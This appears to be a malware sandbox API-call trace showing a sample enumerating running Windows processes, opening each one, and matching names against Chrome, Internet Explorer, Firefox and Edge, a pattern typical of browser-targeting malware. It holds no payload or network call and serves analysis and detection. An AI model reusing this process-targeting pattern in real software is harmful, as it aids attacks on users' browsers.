	[0241.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.452] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.452] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0241.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x85c4
	[0241.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.453] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0241.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.454] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.454] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0241.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.454] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0241.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x85c8
	[0241.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.455] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0241.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.456] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.456] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0241.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.456] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0241.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x85cc
	[0241.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.458] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0241.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.458] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.458] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0241.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.459] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x85d0
	[0241.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.460] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.460] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.461] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.461] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.461] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x85d4
	[0241.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.462] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.462] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.463] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.463] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.463] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.464] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x85d8
	[0241.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.464] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.465] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.465] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.465] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x85dc
	[0241.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.466] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.467] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.467] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.467] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x85e0
	[0241.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.469] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.469] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.469] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.470] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.470] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x85e4
	[0241.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.471] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.471] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.471] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.472] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x85e8
	[0241.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.473] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.474] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.474] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.474] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0241.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x85ec
	[0241.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.476] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0241.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.476] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.476] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0241.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.477] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x85f0
	[0241.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.478] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.478] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.478] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.479] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0241.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x85f4
	[0241.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.480] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.480] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.480] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.481] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x85f8
	[0241.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.482] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0241.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.482] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.483] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0241.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.483] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.483] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x85fc
	[0241.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.484] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.484] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.485] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.485] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.485] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8600
	[0241.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.486] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0241.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.486] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.487] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0241.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.487] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0241.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8604
	[0241.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.488] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0241.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.489] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.489] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0241.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.490] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0241.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8608
	[0241.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.491] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0241.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.491] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.491] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0241.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.492] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0241.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x860c
	[0241.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.493] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0241.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.493] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.493] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0241.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.494] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0241.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0241.495] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0241.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8610
	[0241.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.495] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0241.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.496] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.497] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0241.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.497] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.498] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0241.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8614
	[0241.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.499] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0241.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.499] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.499] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0241.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.499] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.500] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0241.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8618
	[0241.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.501] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0241.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.501] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.501] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0241.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.502] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.502] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0241.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x861c
	[0241.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.503] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0241.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.503] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.503] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0241.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.504] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0241.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8620
	[0241.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.505] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0241.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.506] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.506] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0241.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.507] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
